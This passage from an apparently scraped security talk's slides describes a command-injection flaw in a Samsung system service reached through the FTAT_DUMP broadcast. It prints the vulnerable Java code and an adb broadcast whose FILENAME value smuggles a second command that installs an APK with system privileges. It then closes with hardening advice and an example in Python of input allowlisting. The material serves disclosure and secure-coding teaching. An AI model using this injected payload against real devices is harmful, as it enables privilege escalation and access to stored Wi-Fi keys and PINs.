This is the DoShellCmd function
```java
private boolean DoShellCmd(String paramString) {
    [...]
    // Creates a shell command line: /system/bin/sh -c <paramString>
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "/system/bin/sh";
    arrayOfString[1] = "-c";
    arrayOfString[2] = paramString;
    [...]
    // And runs it: our FILENAME parameter is still not modified
    Runtime.getRuntime().exec(arrayOfString).waitFor();
    [...]
    return true;
}
```
BINGO!
OEM SOFTWARE
![Page 160: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/160.jpg)
Access to all permissions declared by system apps (156 in this case)
Access to all files belonging to the system user: Wi-Fi keys, password, PIN and gesture storage...
OEM SOFTWARE
![Page 161: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/161.jpg)
```
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #'
Broadcasting: Intent { act=com.android.sec.FTAT_DUMP (has extras) }
Broadcast completed: result=0
```
A simple broadcast for the FTAT_DUMP action
We declare the FILENAME argument
We point the destination file to /dev/null
We execute our system command; the trailing # turns the ".log" suffix the service appends into a shell comment
Since the receiver requires no permission, any installed app can send the same broadcast; adb is only the convenient way to show it
OEM SOFTWARE
![Page 165: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/165.jpg)
Open bar!
OEM SOFTWARE
![Page 166: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/166.jpg)
Moral of the story
It happens at application level
Look after your app's backdoors: don't export local services, use a strict permission model
Consider every input as a threat: validate and escape every sensitive parameter you receive, and never hand one to a shell
OEM SOFTWARE
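The two halves of that moral, as an added example (Python, not the Samsung code or the talk's material): the first function rebuilds the exact command line FTATDumpService hands to sh -c and a small splitter shows what the slide's payload turns it into; the second is a hardened replacement that allowlists FILENAME, confines the output path to /data/log and returns an argv list with no shell at all. LOG_DIR, the allowlist and the 64-character limit are assumptions, not values from the original.

```python
import posixpath
import re

LOG_DIR = "/data/log"  # assumed: the directory the service writes into on the slide
# Allowlist for the FILENAME extra (assumed policy): no '/', no '.', no shell metacharacters
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# The payload from the slide's adb broadcast (--es FILENAME '...')
PAYLOAD = "../../../../../dev/null; /system/bin/pm install an.apk; #"


def vulnerable_command(filename):
    """Rebuilds the argv FTATDumpService passes to Runtime.exec: a shell, -c, and
    one command line with the untrusted FILENAME pasted into the middle."""
    return ["/system/bin/sh", "-c", "dumpstate > " + LOG_DIR + "/" + filename + ".log"]


def shell_statements(cmdline):
    """Approximates how sh -c reads the line: '#' at the start of a word begins a
    comment, ';' separates statements. Enough to show what FILENAME becomes."""
    body = re.split(r"(?:^|\s)#", cmdline, maxsplit=1)[0]
    return [s.strip() for s in body.split(";") if s.strip()]


def hardened_command(filename):
    """Validates FILENAME against the allowlist and confines the target path to
    LOG_DIR. Returns (argv, output_path): the caller runs argv directly (no shell)
    and opens output_path itself, so nothing in FILENAME is ever parsed as a
    command. Raises ValueError on anything that does not fit."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected FILENAME: %r" % filename)
    target = posixpath.normpath(posixpath.join(LOG_DIR, filename + ".log"))
    if posixpath.dirname(target) != LOG_DIR:  # defence in depth against traversal
        raise ValueError("path escapes %s: %r" % (LOG_DIR, target))
    return ["dumpstate"], target


def accepts(filename):
    """True if hardened_command would run for this FILENAME."""
    try:
        hardened_command(filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print("vulnerable:", shell_statements(vulnerable_command(PAYLOAD)[2]))
    print("hardened:  ", hardened_command("FTAT_crash1"))
    print("hardened rejects payload:", not accepts(PAYLOAD))
```

The Java equivalent of hardened_command is to keep the allowlist check and run dumpstate through an argument array (Runtime.exec with a String[] and no sh -c, or ProcessBuilder), writing its stdout to the validated file yourself; and, independently of input handling, the receiver should not be reachable without the permission in the first place.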
![Page 167: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/167.jpg)
![Page 168: PlayStore bashing: learn from the biggest fails on the Google Play Store](https://reader033.fdocuments.net/reader033/viewer/2022060106/54b3a3874a795941648b45f7/html5/thumbnails/168.jpg)
Thank you for your time!
http://eyal.fr
SLIDES http://bit.ly/andbigfails